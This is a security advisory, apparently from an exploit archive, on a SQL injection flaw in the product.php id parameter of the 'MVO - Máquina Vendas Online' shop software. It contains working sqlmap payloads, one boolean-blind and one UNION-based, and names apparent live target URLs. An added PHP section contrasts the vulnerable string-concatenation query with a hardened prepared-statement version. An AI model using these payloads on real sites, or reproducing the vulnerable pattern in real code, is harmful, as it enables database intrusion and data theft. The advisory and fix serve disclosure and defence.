# SQL Injection on MVO - Máquina Vendas Online
# Risk: High
# CWE number: CWE-89
# Date: 13/10/2014
# Vendor: adnweb.es
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
# Vulnerable File: product.php
# Exploits: http://www.targXet.pt/product.php?id=[SQLI]
# PoC: http://www.florXes.pt/product.php?id=31
--- "SQLi using sqlmap" ---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=31' AND 7612=7612 AND 'AUyP'='AUyP
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: id=31' UNION ALL SELECT CONCAT (0x7177687471,0x4c526646645746766575,0x717a616f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
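The defect class behind the sqlmap findings above, and its fix, as an added illustration that is not taken from the vendor's product.php (whose source is not part of this advisory): the `id` parameter is interpolated into a single-quoted string literal, which is why the `31'` payloads close the quote and reach the WHERE clause; the hardened version validates the value as an integer and binds it as a PDO parameter. The table name, column name and DSN are assumptions.

```php
<?php
// Added example (not the vendor's code): vulnerable vs. hardened product lookup.
// Assumed schema: table `products` with integer primary key `id`.

$pdo = new PDO('mysql:host=localhost;dbname=shop', 'user', 'pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepared statements
]);

// --- Vulnerable pattern (what the advisory describes) ---
// The raw value lands inside single quotes in the SQL text, so an id such as
//   31' AND 7612=7612 AND 'AUyP'='AUyP
// is parsed as SQL instead of as data.
function getProductVulnerable(PDO $pdo, string $id): ?array
{
    $sql = "SELECT * FROM products WHERE id = '" . $id . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Hardened form ---
// Reject anything that is not a positive integer, then pass the value as a
// bound parameter so the database never interprets it as SQL.
function getProduct(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400); // bad request: id must be a positive integer
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM products WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage in a page like product.php:
$product = getProduct($pdo, $_GET['id'] ?? '');
```

With the hardened version, both payloads listed above fail the integer check and never reach the query, so a boolean-based or UNION-based probe returns the same 400 response as any other malformed id.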
# Thanks